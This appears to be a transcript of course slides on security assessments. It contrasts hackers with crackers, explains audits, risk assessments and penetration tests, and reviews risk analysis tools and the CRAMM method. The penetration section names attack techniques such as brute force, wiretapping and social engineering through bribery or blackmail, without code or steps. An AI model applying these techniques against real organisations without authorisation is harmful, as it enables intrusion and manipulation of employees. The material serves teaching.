assessments lesson 3. the hacker mindset hacker is someone who tries to “figure out how things...
TRANSCRIPT
Assessments
Lesson 3
The Hacker mindset
Hacker is someone who tries to “figure out how things work”Originally a term of respect given to the uber-geekSomeone who could quickly create software code that worked – ie… hack out a routineOriginal hackers were often looking for loopholes to increase their allotment of CPU time on early mainframesQuest for knowledge
The Cracker mindset
Someone who tries to break into a computer system for malicious purposes (defacement, theft, fraud, denial of service)Thought to have been coined by hackers to differentiate themselves in the 1980sMedia uses hacker when they usually mean crackerKey is intent of actions and attitude
The Cracker mindset (cont.)
Lots of examples of cracker activityTheft: CD Universe and 300,000 credit cards
Russian cracker named MaxusRansom demand of $100K to $300KJanuary 2000
DefacementsInternet is a tempting target
BizRate.com estimated sales of $1.2B during a single week of December 2000
Typical Cracker Activity 2/18/01
What are security assessments
Assessments are an examination of an organization’s current security postureA good mechanism to find and fix holes before someone else finds themKeep in mind – someone else is looking for your security holes even if you aren’t
What are security assessments
Three common terms for security assessments
Security AuditRisk AssessmentPenetration Test
They may sometimes be used synonymously but they are not the same
What are security assessments
Security AuditMore of a compliance checkChecklists and standardsPolicies and proceduresBackupsVerification
Are you doing what you are supposed to be doingBS 7799 (British Standards Institute Code of Practice for Information Security Management)
Controls and practices
What are security assessments
Risk AssessmentAlso more of a paper exerciseWeighs likelihood against impactWeighs cost against benefit
Much more business oriented
What are security assessments
Penetration TestLooks for security vulnerabilities
Unpatched operating system or applicationKnown security holesAccounts with weak or no passwords
Examines impact of discovered vulnerabilitiesTargets digital, physical, and personnel (social engineering)
Hands on test of network securityMore thorough and effective
Penetration Techniques
Breaking into computers and networks can involve technical attacks or social engineering.
Technical attack: involveEavesdroppingBreaches of access controls
Social Engineering (misrepresentation): relies on lies, bribes and forms of seduction that can trick honest or marginally dishonest employees into revealing authentication information.
Technical Attacks
Breaching access controlsBrute Force attacks
Demon/war dialing
Exhaustive search for userid/password
Scavenging RAM
Intelligent GuessworkCanonical passwords (default passwords & accounts)
BAD passwords
Discarded MediaShoulder surfing
Technical Attacks
Intercepting CommunicationsCan obtain information by monitoring communication between a peripheral node and the host.
Wiretapping – intercepting the data stream on a communications channel
Phone lines, leased lines, long distance transmissionsInternet connections
LAN sniffersOptical fiber: can be tapped
WirelessRadio and wireless phones, wireless networksCellularPacket radio
Van Eck interception (emanations security)
Technical Attacks
Penetration TestingLook for vulnerabilities in applications and servicesCommercial and freeware scanners
Many specialized freeware vulnerability scannersWhisker scans for over 500 web-based vulnerabilities
Can scan over SSLHas IDS evasion modesVery powerful in the right hands
There’s a scanner for most major vulnerabilitiesFreeware scanners are usually better and more up to date
Examine each target and services on the targetExamine logins and use brute force tools if allowedLots of research
Technical Attacks
Penetration Testing – Web TestingScan for vulnerabilities
Example: Microsoft IIS 4.0 / 5.0 Extended UNICODE Directory Traversal VulnerabilityPublished in Oct 2000Access to files with IUSR account permissions on same logical drive as the web serverCan give cmd line access to remote attacker
Scan for presence of sample materialsExamine code of web pages (view source)Examine input fieldsCreate test accounts if allowed
Technical Attacks
Penetration Testing – Dial UpOften overlooked access methodOften unsecuredDial company phone numbers looking for modems
Several commercial and freeware scanners available
Test security of discovered modemsDefault passwords work most of the timeTest remote access packages with client software
Penetration Testing – Wireless NetworksOften left with little or no securityFootprint often extends into publicly accessible areas
Social EngineeringPenetration Testing – Social Engineering
Might not be allowedTrying to trick someone into giving you accessPose as administratorPose as new userSound like you belong
LyingImpersonating authorized personnelImpersonating 3rd party personnel
Subverting Employees and 3rd party personnelBriberySeductionExtortionBlackmail
Physical Techniques
Penetration Testing – PhysicalDoor and lock testing
Are servers locked upIs access to telco closets secured
Shoulder surfingClipboard testingDumpster divingWork area security
Do employees use password protected screensaversPasswords on stickiesSensitive materials left out
Results
Document and catalogDetermine extent of discovered vulnerabilities to answer “how bad is it”Record discoveries, systems affected, method of exploit, accounts and systems compromisedMust keep information organized
Reporting
Report generationProvide management level summaryProvide technical level summaryPresent findings in a clear and specific mannerProvide solutions to eliminate or mitigate vulnerabilitiesReport is usually the only physical remnant of the assessment
CountermeasuresStrengthening the perimeter
Identification – single sign-on decreases risk somebody writes something downAuthentication – designed to make impersonation difficult
BiometricsCallbackSmart cards and tokensOne time passwords
EncryptionTransmissionData storage
Monitoring
Risk Analysis Automated Tools
The Buddy System® is a hybrid software package used to identify and deal with system or project risks. It offers both qualitative and quantitative Risk Analysis and Reporting of information or physical security in virtually any environment. The purpose of ASSET is to automate the completion of the questionnaire contained in NIST Special Publication 800-26, "Security Self-Assessment Guide for Information Technology Systems”HIPAA EarlyView™ Security version 2.0 was designed to help covered entities assess their current state of compliance with the Final HIPAA Security Rule. Users answer a series of 165 questions that correspond to each requirement, and the software features over 20 built-in reports to help track progress.
Fundamental Elements of A Risk Analysis Tool
A comprehensive risk analysis tool consists of three fundamental steps:
o Data collection o Analysis o Output results
Not only should the risk analysis tool meet this basic criteria, it should meet organizational requirements as well.
Data Collection
Asset Identification and ValuationThreat AssessmentVulnerability AssessmentCurrent Safeguard Effectiveness
AnalysisThe analytical process analyzes the relationships between assets, threats, vulnerabilities and/or safeguards, and possibly other elements (e.g., likelihood of occurrence) to determine potential losses.Some automated risk analysis tools use the traditional quantitative approach for calculating risks (Annual Loss Expectancy)Some risk analysis tools do not average the value of future losses but calculate single occurrence losses (SOL). The qualitative approach takes the point of view that many potential losses are intangible; therefore, risks cannot be easily specified monetarily. Risk results are portrayed in a linguistic manner (i.e., "no risk" to "very high risk").
Output results
Some tools do not address safeguard selection, while some do an extensive job.Some tools consider the costs of safeguards and their return on investment (ROI). The important point is that the risk analysis tool should provide managers with a good understanding of where to apply limited dollars to protect vital computer assets.
Picking an Automated Tool“GUIDE FOR SELECTING AUTOMATED RISK ANALYSIS TOOLS” --NIST SP500-174
An automated risk analysis tool should contain modules for data collection, analysis, and output results Effective reporting of the risk analysis results will help managers to weigh the alternatives and to select reliable and cost-effective safeguards. Therefore, the types of information expected in the output reports should be clearly defined The ability to maintain a history of the information collected during the data collection phase of the analysis is useful in subsequent reviews or queries
Example selectionUNEMPLOYMENT INSURANCE RISK ANALYSIS PROJECT -- GARTNER GROUP Project staff contacted the vendors and arranged on-site evaluations of their automated risk analysis tools and training programs. The evaluation was performed using the National Institute of Standards and Technology's (NIST) Special Publication 500-174, Guide for Selecting Automated Risk Analysis Tools. For evaluation purposes, NIST recommends scoring the tools in various areas of capabilities.
Each NIST capability was scored from a value of 0 to 3. A score of 0 indicated that the capability did not exist, or if it did exist its quality was inferior. A score of 1 indicated that the capability existed but that it was less than adequate to perform the required tasks. A score of 2 indicated that the capability existed and was considered average. A score of 3 indicated that the capability existed and was considered above average.The capability scores were then totaled to determine the best available automated risk analysis tool.
WEIGHT FACTOR
RISK RISKCAPABILITIES WATCH LAVA PAC
METHODOLOGY:
Quantitative Results 3 1 1
Qualitative Results 3 2 2
DATA COLLECTION CAPABILITY:
Assets 3 2 2
Threat Sources 2 2 2
Vulnerabilities 3 2 2
Safeguards Evaluation Effectiveness 3 2 2
UTILITY:
Ease of Use 3 3 3
Menu Driven 3 3 3
On-line Help Facility 3 0 2
Error Messages 3 0 2
Reiterative Safeguard Selection 3 2 2
Quality of Documentation 3 3 3
RISK RISKCAPABILITIES WATCH LAVA PAC
SECURITY CONTROLS:
Log-on/Password 2 0 0
Audit Trail 2 0 1
REPORTING CAPABILITIES:
Safeguard Selection 2 1 1
Safeguard Cost/Benefit Analysis 3 1 1
Management Oriented Format 2 1 1
Graphic Representations 3 2 0
Detail Narrative 2 1 1
Print/Display Full Report 2 1 2
Print/Display Loss Analysis 2 1 1
Cover Pages 2 2 0
Table of Contents 1 2 0
Page Header/Footers 1 1 1
PRODUCTION SUPPORT:
Vendor Provided Training 3 2 2
Installation Support 3 3 3
Telephone Support 3 3 3
Scheduled Enhancements 3 3 1
OTHER:
Cost 2 2 3
SESA Knowledge Base 3 1 2
Tailoring for Site Specific Concerns 3 0 2
TOTALS 44 27 25
CRAMM Methodology
Developed in 1986-1987. Last version (V3.0) released in 1997 Used in thousands of reviews worldwide Provides the ability for checking scenarios
(what-if)
Provides catalog of threats and countermeasures
CRAMM
Risk evaluation is done ...
By evaluating assets (scale 1:10)
By evaluating threats (scale 1:3)
By evaluating vulnerabilities (scale 1:3)
Impact evaluation is integrated in the vulnerabilities evaluation
CRAMMPhase 1: definition of study’s boundaries
Preparationsasset evaluationfindings review
Phase 2: Threat Evaluation Relation realization Evaluation of threats and vulnerabilities Calculation of risk level findings review
Phase 3: Countermeasure selection recognition of the selected countermeasures comparison with already existing ones design of security package findings review
Types of countermeasures
Reduces the probability of threat occurrence
Reduces vulnerabilities
Reduces impacts
Combination
Summary
Hacker MentailitySecurity AssessmentsPenetration TechniquesRisk Analysis ToolsCRAMM